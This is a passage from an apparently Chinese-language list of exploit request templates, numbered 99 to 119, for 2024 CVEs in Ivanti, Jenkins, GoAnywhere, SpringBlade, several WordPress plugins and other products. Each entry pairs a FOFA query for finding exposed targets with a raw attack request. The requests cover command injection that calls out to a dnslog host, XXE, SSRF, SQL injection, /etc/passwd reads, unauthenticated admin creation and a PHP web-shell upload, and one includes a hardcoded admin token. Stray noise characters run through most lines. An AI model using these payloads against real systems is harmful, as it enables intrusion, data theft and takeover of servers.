User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- |+ D) s* z; n
Connection: close
6 K& z3 J) f% \$ S- G6 O' cContent-Length: 1212 G& ]( F8 t/ E1 e& o1 l6 }
Accept: */*
. d1 Y! G1 W0 cAccept-Encoding: gzip, deflate
1 [5 I8 s0 Z. l( P2 M6 o% [+ vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 f! O% i" ^2 k0 Z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8- z8 L" c8 v. x% W- w% c: ]
X-Requested-With: XMLHttpRequest) O) w9 G. {- N
' T! O4 }1 i# w" k1 P! C$ Y0 aid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B1 k8 H, v$ d* e$ N3 ]- [5 {0 C
5 Y4 y3 I7 t& m" L5 t( H; t( J( ?3 l
+ F( A" N8 ~0 W1 g+ ?; d, ~
99. Ncast盈可视高清智能录播系统busiFacade RCE, P7 s7 }9 f2 Q! J
CVE-2024-03058 m* k" o" T2 U. p0 B! b, `0 o6 o
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
- K6 ~6 P* K4 S$ o! vPOST /classes/common/busiFacade.php HTTP/1.1* z7 ?3 S3 }2 `1 I7 E
Host: 192.168.40.130:8080
" @+ W, e9 w+ {) j; m0 y' ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 W% i+ P! c+ M) [Connection: close. I, Q3 B. l0 g$ w' H
Content-Length: 154+ @+ }3 W; ]/ `; |- g% d: g
Accept: */*0 \# h4 M) Y3 W7 L1 |% I$ B5 m
Accept-Encoding: gzip, deflate
4 @9 g: v$ V+ X; _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% b% f5 q# _ p- _3 sContent-Type: application/x-www-form-urlencoded; charset=UTF-8
- r( G r t3 q e3 EX-Requested-With: XMLHttpRequest' Q) Y- r: K. T9 V' h
, V* n/ l5 b8 }+ P5 y/ c _3 S1 f) l
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
9 \ @; t! X7 y# n8 i
2 T$ D8 ?& S' m& s
# g& D! ~+ ^: B. k" R100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ `: [" l5 Z/ K. U* [# YCVE-2024-0352
5 W, U* B4 U3 k. v$ Z6 NFOFA:icon_hash="874152924"
" F$ N: @9 A5 A- R/ W1 T( YPOST /api/file/formimage HTTP/1.1
. y! l; E& l6 gHost: 192.168.40.130
l4 O2 }6 G* k' nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.364 P/ P$ ?. ]/ l4 k2 n; ^3 K9 l
Connection: close0 s; G, Z# [# X5 M
Content-Length: 201: y3 t* f2 M5 b4 G, j) t$ @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
% m+ ? n. G. H0 n5 HAccept-Encoding: gzip
2 v: l$ n2 V1 O% X. y' F4 ~6 V7 d6 e/ ~0 c4 Y" N
------WebKitFormBoundarygcflwtei5 {. C/ I% y; Z& ~2 s
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
) @" t: E% ^- I6 h& }, A+ TContent-Type: application/x-php
0 M* x v4 x: F' }
4 s8 U) I9 l' @- K w; C9 L2ayyhRXiAsKXL8olvF5s4qqyI2O
# a' F4 }, u7 ?- P5 {------WebKitFormBoundarygcflwtei--
0 G6 k2 G2 d6 f" V/ [+ w; q8 g
" |1 n1 F# g! G1 e$ f5 V: J& O, y7 R2 m8 |7 @
101. ivanti policy secure-22.6命令注入, Y0 ]& l: P7 A; i
CVE-2024-218878 u$ p8 V* m: B3 ~' s0 ^! J. g5 X
FOFA:body="welcome.cgi?p=logo"
$ w9 C% v4 B! h5 V' K5 `' g( \GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
2 }3 I0 o" L3 Q7 \9 T+ {3 oHost: x.x.x.xx.x.x.x- V! r: T$ z- O& j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 P4 \' ~; O4 @6 F+ `9 q5 Q
Connection: close; ]& g2 n4 L3 k- K: a
Accept-Encoding: gzip9 r3 {9 k. {' f% B" ^( [" \
0 @1 v' k) B8 i3 }, G
0 A! O4 R% _! d6 d
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行! g) w0 m0 i% u! O
CVE-2024-21893
f4 ~* X* v9 G3 ]FOFA:body="welcome.cgi?p=logo"
# m- g0 @0 R, H. x; `POST /dana-ws/saml20.ws HTTP/1.1
: ^& I7 Q3 p; Y5 j8 q9 w$ A) VHost: x.x.x.x
# L; [+ p7 h- L/ {$ x, q2 ]. d) D7 l! oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, L$ ~3 c# g7 ?7 eConnection: close8 U' \8 d! \* c( R+ b. p
Content-Length: 792$ y9 [8 n+ m4 H( L* P
Accept-Encoding: gzip. \3 J1 F7 E/ R) [7 X; D
7 M; O: m# Y4 ?/ G) _7 l
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>0 G) Y, D; o; y; g/ N" _
# |; W5 a# B8 ^9 p" H2 N103. Ivanti Pulse Connect Secure VPN XXE
2 s+ `/ |* y6 r" n' S3 JCVE-2024-22024
/ D/ Y8 V# ^8 ]- ]9 i2 CFOFA:body="welcome.cgi?p=logo"( Y: Q8 m' v% g$ ?
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
# X% p# z" B9 a* u4 KHost: 192.168.40.130:111( y2 \+ A3 K/ P1 C
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 W8 b' m, ^) \& s( l1 ~% W; {/ a0 Y/ @Connection: close) i- L. v" R7 a
Content-Length: 204+ |! t. @$ W' ^5 t$ m- q$ @- N
Content-Type: application/x-www-form-urlencoded
6 r; o7 ]. Z. c3 c/ ^, ~ fAccept-Encoding: gzip, h3 H$ _- d& F; K {
% c0 N G+ S- ~% n1 I' x5 W5 \SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==& C7 \ r+ j- }0 J* O$ P
) X+ ~% |* `! x7 n1 X ]
! ]$ K i1 u. @! K; V {其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
9 `& ^( [ w. X<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
; |9 Y( I. L. r4 h
# Q& i0 N: o' F2 M5 U$ _ }. |
# ` _7 ?' M! I9 m104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 d) R7 G" U) N: TCVE-2024-05698 `4 d; S" T; T) F' O
FOFA:title="TOTOLINK" P( n" C1 G( v1 n1 u9 Y3 D
POST /cgi-bin/cstecgi.cgi HTTP/1.1: t% N+ q$ x: @5 @" L: C4 [
Host:192.168.0.1* `4 d' j, T3 |2 s' \) c9 \
Content-Length:41
& Z/ W6 n. Y) r `Accept:application/json,text/javascript,*/*;q=0.019 e* G! q& [3 d1 l, n _
X-Requested-with: XMLHttpRequest
" O. Z# e( G, [5 L O- x; IUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
( B2 |& T7 N. [; _: x% r3 RContent-Type: application/x-www-form-urlencoded:charset=UTF-87 \/ C2 U" J" O& x# {5 d
Origin: http://192.168.0.1
# u# f! s9 _0 w# lReferer: http://192.168.0.1/advance/index.html?time=1671152380564
/ W- i" S. `7 Y# S# HAccept-Encoding:gzip,deflate
- ]5 j8 R3 R+ {( [8 sAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.77 [3 c d0 y3 T( G
Connection:close% Q r2 U) }8 S5 d
; X+ a- w$ V& Q
{
/ A# r2 E2 ]% J1 I; y# s P, E"topicurl":"getSysStatusCfg",
! K1 t+ [2 `- T) w5 v: l- j"token":""
$ B6 z/ Y# @) v' Y* p" |5 _9 d}/ l$ _6 L& J, x' h' ]) ~
; j. Q9 R$ d6 l# Q# o105. SpringBlade v3.2.0 export-user SQL 注入
4 O0 d4 w6 [, k0 I- [FOFA:body="https://bladex.vip"2 |( T" ^: L* X. F
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
( E1 r8 d ?7 @3 ?
; p) V, n' m9 F2 n106. SpringBlade dict-biz/list SQL 注入
, q2 R0 I! Q; z6 t2 lFOFA:body="Saber 将不能正常工作"! A9 V; G* f7 Q$ K0 O1 [
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& i1 f( E y: y* @5 }9 t- ~$ ^
Host: your-ip7 S* O% g9 X9 w) _4 z6 e+ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 ~/ h2 h/ @( T' r- o+ N! ~0 c
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A- e8 ^ |3 G0 Q" b# L) v$ O' X
Accept-Encoding: gzip, deflate9 Z% P$ T8 W& j4 S
Accept-Language: zh-CN,zh;q=0.91 r( O2 N' t8 E/ Y- W; z% R
Connection: close
" D6 y: h! r7 K" V( N1 C3 @8 K& I
% D6 d: W E' P/ v& a& l) j& I$ e8 N# \" z
107. SpringBlade tenant/list SQL 注入
$ o w$ e! r3 F# O6 C1 ]- fFOFA:body="https://bladex.vip"! `% j* m0 D7 a: U% @3 L% d3 [
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
# ?2 z6 {* |! e" e+ NHost: your-ip3 B& o4 s3 g/ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ |5 I1 ^' V+ h4 b
Blade-Auth:替换为自己的
6 r% ], i& b# o7 t2 ]Connection: close* F7 s6 C, h6 F1 e
( {6 m( @/ [$ z; l" b' \" |: q: n4 {) ?2 b; l8 c1 R
108. D-Tale 3.9.0 SSRF
) a3 e( r* ]7 ?1 ^CVE-2024-21642+ @1 g# `2 B7 W4 i1 O
FOFA:"dtale/static/images/favicon.png"0 U) N3 O# Y8 f0 d! }1 M" S, v# l
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
% u0 q3 p; K) n" n+ y& z8 qHost: your-ip
4 ?) `! o9 r; v8 _7 vAccept: application/json, text/plain, */*! I x' _! S9 e+ Z4 S, F: z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" z& g9 g3 s9 F4 D. TAccept-Encoding: gzip, deflate
! @4 P/ |; U+ ^5 S) f7 y# ?9 m# vAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ Z4 i, G* w5 |Connection: close" h& \" ?2 Q+ J- T" n
2 B- a, _& t3 B5 z" \( q$ ?! Y2 ^) t; f) f0 i$ F9 O1 n( z! ~
109. Jenkins CLI 任意文件读取
: a* l) k+ v: q/ ^7 ~" ACVE-2024-23897
# S' f" @/ K# {( k1 U" V# r6 i# @FOFA:header="X-Jenkins"
@, I( G, d T" o1 ?: CPOST /cli?remoting=false HTTP/1.1! q3 }, m! I- i1 z% u" l
Host:
) n! H1 ], X# W: P8 Q8 l! QContent-type: application/octet-stream
' e# y y, u( j# mSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
1 G# Z8 }# A% L% DSide: upload
1 g% f p! n& G3 N( _Connection: keep-alive) v+ [* {: F7 g6 }' N
Content-Length: 1633 v4 y( S' S G5 s
( ]. ?- b( D" m+ D4 tb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
" {- }" I; M" P" c& |7 y6 |6 h# [: k1 ?$ k( ^: O& E
( \ \) U7 x% i. \POST /cli?remoting=false HTTP/1.1
& x; J( a8 z! M* i- i. Q) aHost:, V( E/ K/ n2 ^# C3 W$ M4 W
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92& G' ]" \4 J, W, }
download
' D% ?! ]( D Q7 WContent-Type: application/x-www-form-urlencoded" v- _7 H# ~# w7 ~9 j& B5 z
Content-Length: 0+ `0 [3 |& |9 e
V$ E3 L& w: d) l) R8 p' {
+ H: ^7 H4 @9 |: _! _$ p8 Y1 C/ B4 L: PERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
6 J7 Z+ h, S! v' K2 {" c7 y3 `java -jar jenkins-cli.jar help/ {! f/ N$ }* f/ _8 t
[COMMAND]
7 S3 S2 \' A1 f6 t7 ]6 r5 tLists all the available commands or a detailed description of single command.4 y7 z& c$ z, j" t9 \0 p: U
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
; h3 z" T3 [' m% `" r
% |4 o2 @. C7 R: @8 ]* Z0 I8 f; e2 B0 C# H" f
110. Goanywhere MFT 未授权创建管理员6 V& W( h9 _, }6 S" X& X- v
CVE-2024-0204
4 L7 r, e3 ~4 h" WFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
' P! n! H+ `+ @9 BGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
6 [, `6 g* ^8 c FHost: 192.168.40.130:8000
4 h C% ]; @8 }* W5 T4 Z0 f1 XUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
, D& D+ k: u' d# v+ G: |8 C5 rConnection: close
$ m j: \- u4 r3 r4 |& d& U- a) w- \Accept: */*# k4 j1 ~, x) n
Accept-Language: en
7 l# ? s9 H! }0 cAccept-Encoding: gzip
& R2 }( A2 V0 X: K ]( B7 K- Z1 R$ c! n) Y
7 ?! b6 a" C# S
111. WordPress Plugin HTML5 Video Player SQL注入
9 ^( l1 @' [. R: lCVE-2024-10614 z6 W J5 \ ?/ m* U
FOFA:"wordpress" && body="html5-video-player"( n; ^9 ^5 b5 _2 b% i/ ~( _* Z
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
' _ E/ L- w" d; xHost: 192.168.40.130:112 z" |2 N+ ^6 W) l6 ~* A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: q5 P' C+ ?! TConnection: close
* o0 d! I. R6 lAccept: */*) [. ]5 Z6 K! O2 e' h! l5 O! s) d) [$ d- \
Accept-Language: en
! W' Q( ]% V- G( ` k" |0 KAccept-Encoding: gzip
4 I) V: V. q+ o5 Y+ C: h
* G- r$ \: i$ E& r. r& c1 b8 q6 c1 ?% K0 Y! u
112. WordPress Plugin NotificationX SQL 注入) p8 ^( j, O% u, Z/ ]' @" z
CVE-2024-1698/ h/ y% c6 r0 W% G5 X
FOFA:body="/wp-content/plugins/notificationx" \" K$ G' X+ u: ]5 [ M$ ]
POST /wp-json/notificationx/v1/analytics HTTP/1.1
9 ]; _5 P# ^- W# E, \1 }Host: {{Hostname}}7 l) c: x/ H7 j; p: `' z \
Content-Type: application/json' A6 o3 |" B6 E& \ j9 U$ }
$ F$ L( A4 l! }: X- Q. z7 S3 Q8 e
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}6 c, V: z% `! x3 a+ Z+ ]5 F- f8 u
/ V- B/ D/ o( L& s. H6 ?/ o
- b/ d P! [- \113. WordPress Automatic 插件任意文件下载和SSRF
' z8 v1 s% j) |9 L& C8 R9 H1 UCVE-2024-27954
1 t# N& P8 C0 q: eFOFA:"/wp-content/plugins/wp-automatic"
% Z s+ b/ L. S, gGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" O2 U2 a( F1 ~& C
Host: x.x.x.x3 x `: u S' v \" |+ D5 a
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
; |& z% B ?0 D( y4 F8 ZConnection: close
3 y/ V$ n: x+ ]5 V$ Z1 gAccept: */*
, h: s6 m0 C6 S9 a1 i# XAccept-Language: en
9 S$ D* t2 H: S- Y& ~Accept-Encoding: gzip& x9 Q: F% s1 J6 x+ H! h3 P. B
% r+ p# k1 W) p* f9 P _1 Q
* X! a/ i- ]* S114. WordPress MasterStudy LMS插件 SQL注入5 L+ q4 p$ {& L, ~3 i
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"* r' ^( \" p, r; [7 D0 |3 ?6 {
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1* p- S$ N5 G. i/ c
Host: your-ip
" A2 t/ u- }+ v9 qUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. T, G R7 I. C6 B1 ]
Accept-Charset: utf-8! E% e2 e5 j. g0 ]* D7 F
Accept-Encoding: gzip, deflate0 T9 e9 m$ b& T. p' d* `; M
Connection: close" R; G1 w4 ^% m+ x
! x% i$ U$ t5 O0 C& ~. y% C9 A* }/ l1 X% ~
115. WordPress Bricks Builder <= 1.9.6 RCE2 o f0 G# P5 M/ i3 l6 o* R
CVE-2024-25600
4 `/ [( f1 a! r" }8 {) mFOFA: body="/wp-content/themes/bricks/"
% q& ` q# D' ~第一步,获取网站的nonce值+ D; h a# @' N
GET / HTTP/1.1, L- X9 l/ M1 B6 i4 H
Host: x.x.x.x
4 Z9 C7 G4 T- a* f4 u3 h. ], I3 P: fUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
* ]4 }! V1 v: s( z7 T& UConnection: close2 ~" \0 C3 j, W" _1 k% H
Accept-Encoding: gzip+ F% E9 m) B6 ^% Z% {( x8 G# ]
' Y- e# V8 ]* H& I/ b h) s
+ L0 x) Z {: u3 t3 u第二步替换nonce值,执行命令3 {. v; R0 R; m$ m
POST /wp-json/bricks/v1/render_element HTTP/1.1$ p/ d! H4 F5 o; v9 y' }
Host: x.x.x.x c- O% K8 w% a$ T' m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' ]+ p$ F9 d3 R& P9 O2 W& ?
Connection: close
' F; ? ]1 v- R9 ]Content-Length: 356
- \# @' O6 C' g: a N* H: a6 oContent-Type: application/json
1 s/ _) v5 e/ T% j7 @ Z0 CAccept-Encoding: gzip _. \* f4 H5 Y- }
* x" t' r5 \0 Z0 o. |, s% j3 E' U
{
- T. Q9 c* q8 e$ b: C. q4 E- P"postId": "1"," e8 o: q5 }# r2 C: K& j
"nonce": "第一步获得的值",, ?# J8 i9 a. V( ]; Q4 E% {* `( u
"element": {( Y1 t/ f2 ?3 n. `# j! q
"name": "container",
* h2 Y S9 `+ c' E. t7 d2 c2 } "settings": {4 B6 ~: e: x" k/ [1 M
"hasLoop": "true",
; L- S& K' z6 P1 d& X "query": {8 {6 E$ o6 U2 S& g2 o5 [
"useQueryEditor": true,. {, S, C% o, {( |4 H; g
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
1 \- i8 r4 H* C "objectType": "post"
" N' |# l O: \7 t. i }
" B( z' g4 \% y+ r# C: K4 I }6 {7 `9 U! Z0 w
}& ~4 P! z8 F6 M+ C g9 c$ D5 B( w
}
5 v( [, ^9 H8 K' u/ V+ f0 F
! w; K4 B7 b4 ]5 O
8 y8 t* g7 L; H116. wordpress js-support-ticket文件上传
; L! u* V7 x' w2 [FOFA:body="wp-content/plugins/js-support-ticket"
: G3 Z# @( _1 w5 f6 p9 N" nPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.15 v& y' F3 A5 |' m+ ?$ @& J
Host:
: Q K% K8 d9 Q+ tContent-Type: multipart/form-data; boundary=--------767099171/ l s+ S4 p& S7 D4 L3 ]/ d8 C. j
User-Agent: Mozilla/5.0
" _6 B$ S& N/ {# S9 ?* {1 w$ }
( I) X+ `1 `% v* E# Y2 U+ J----------767099171
3 ?, }! L1 P6 ^6 m' G3 N8 v: I2 j9 f1 L* mContent-Disposition: form-data; name="action"
& x# R+ Q" @0 V, mconfiguration_saveconfiguration Q7 _; g* g, S4 m' c1 p
----------767099171
7 ?* z$ f( Q- f3 ^: Q0 h# FContent-Disposition: form-data; name="form_request"
1 q- y1 ~! v6 k T' G, _jssupportticket
! A$ w8 Z7 k/ E ~* B) }, ]' ]----------7670991712 r- y) o0 x7 r# y. z
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"! q; |, U" @- K: r5 K# A* ]
Content-Type: image/png
8 g; ~/ t7 X' _ J----------767099171--
' f% W! R( T, U5 x
+ p4 b7 g+ y, F; N$ a: u+ L3 F
R6 ~: O! N. D117. WordPress LayerSlider插件SQL注入$ d0 j, R+ L* C/ p# p, |8 d
version:7.9.11 – 7.10.0& O/ T( m3 l, _) O* H
FOFA:body="/wp-content/plugins/LayerSlider/"
: ~1 v! N G: _6 }5 c& aGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
0 M4 r+ l ?! Z, @' T6 OHost: your-ip
: I& {" p; I, QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: Q, h- F+ G+ F- G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# j2 N& M* X# }; C6 }! V! c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ [: x0 ^! }" C2 YAccept-Encoding: gzip, deflate, br
b1 Q* _2 Z2 j. ?( b/ g ZConnection: close
0 J5 S2 Q1 y: p7 xUpgrade-Insecure-Requests: 1
4 W% v" W: S7 |6 y" a7 z ]* k! B* L4 H: w2 V& ~* `" u9 u c
; L& ?8 f8 ]1 B3 U! m. x6 |9 }
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 Z) P# H! F! k; {# ^CVE-2024-0939
/ @/ G! c1 t2 r1 i/ K" j( YFOFA:title="Smart管理平台"
2 y- o, C" B) Z, k' z0 Q! _+ o6 V: ?POST /Tool/uploadfile.php? HTTP/1.1
3 L V" N6 @& mHost: 192.168.40.130:8443
+ ^; o8 T1 n* |7 G+ V( I: x. NCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
6 y5 x0 N$ c7 \ q2 B5 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.07 U9 i% }+ f/ k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 B. ^1 f7 b0 Y2 ~$ q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 S6 K" n% w( v- m; x0 KAccept-Encoding: gzip, deflate
$ U, W- w9 b! b! F6 m4 e3 \4 sContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828874 ^6 G5 ~8 c5 l0 }- D# ]1 K
Content-Length: 405! U" ^( u- Z' i; ?# b
Origin: https://192.168.40.130:8443( E1 p+ J. C( z2 f" H
Referer: https://192.168.40.130:8443/Tool/uploadfile.php, q' K6 L( z! i U# |
Upgrade-Insecure-Requests: 1% O7 s1 h8 _2 m( T. Z ^8 O
Sec-Fetch-Dest: document5 m1 G+ Z% |/ `2 \" X! X" q |
Sec-Fetch-Mode: navigate
, L B" e( x5 y# uSec-Fetch-Site: same-origin
! x) ~- s, i$ k! X- `. JSec-Fetch-User: ?1
! K7 p) {4 {8 i2 d* k$ x* _6 oTe: trailers$ p) T$ J4 |/ U" u
Connection: close
' P% J$ o# d6 ^$ U1 J+ a8 A1 ?7 j: F8 p" `
-----------------------------13979701222747646634037182887
; O7 P/ J: h( c/ p8 J# N: N9 M1 Y- rContent-Disposition: form-data; name="file_upload"; filename="contents.php"! V+ M7 W) z8 e, \
Content-Type: application/octet-stream# m; S: T+ {( R" G* x. ^" o
8 k( w2 H4 v) B5 t& _
<?php) V3 U; C# D7 C8 C" T
system($_POST["passwd"]);
, {, _+ T# M e3 u' v; f" ^& {7 l1 X?>1 ^* R- r/ L. J: } n
-----------------------------13979701222747646634037182887
5 @$ l# j, y' H' ^; ^9 qContent-Disposition: form-data; name="txt_path"( [, H- o$ R: [- h0 b5 }8 u$ B
' N8 G% i# f: g7 G/home/src.php
2 G8 w- L4 x) e: m! v: d6 U' a-----------------------------13979701222747646634037182887--
T% a% Y5 e! V" S) b. Q' k- i+ h
5 E6 J; B) C6 ^6 X: Q; E- ~) O
1 _' p K/ _9 s! e2 `) x访问/home/src.php
$ B! w; m1 |" b v3 H* V! Y. x
; ?4 ?: X8 U" M- W$ h119. 北京百绰智能S20后台sysmanageajax.php sql注入
1 \. T! g: Y* w, }$ Q* ?$ P2 ^CVE-2024-1254" c: ?, k0 K7 l# J! t2 h6 l
FOFA:title="Smart管理平台"
; X2 Q5 }4 W+ k3 m p/ l- |6 I3 R先登录进入系统,默认账号密码为admin/admin9 j4 Y+ j$ D$ O) n, j! h
POST /sysmanage/sysmanageajax.php HTTP/1.11$ V9 N1 F7 H; c+ m2 K
Host: x.x.x.x
0 l; R( R) a8 W" F m$ d* |Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee8 w: ~# p' x5 _( u( T. @9 o2 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0; W) s+ `/ i( {
Accept: */*
" f5 h3 e3 L0 G1 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" G; p% K* H' M* c
Accept-Encoding: gzip, deflate* ?5 Y! K+ `% K. J3 x
Content-Type: application/x-www-form-urlencoded;3 ~2 Y. E' u6 g7 V; r6 I3 C! Q
Content-Length: 109
" j4 f, d" B' ^& q( s- g9 xOrigin: https://58.18.133.60:8443
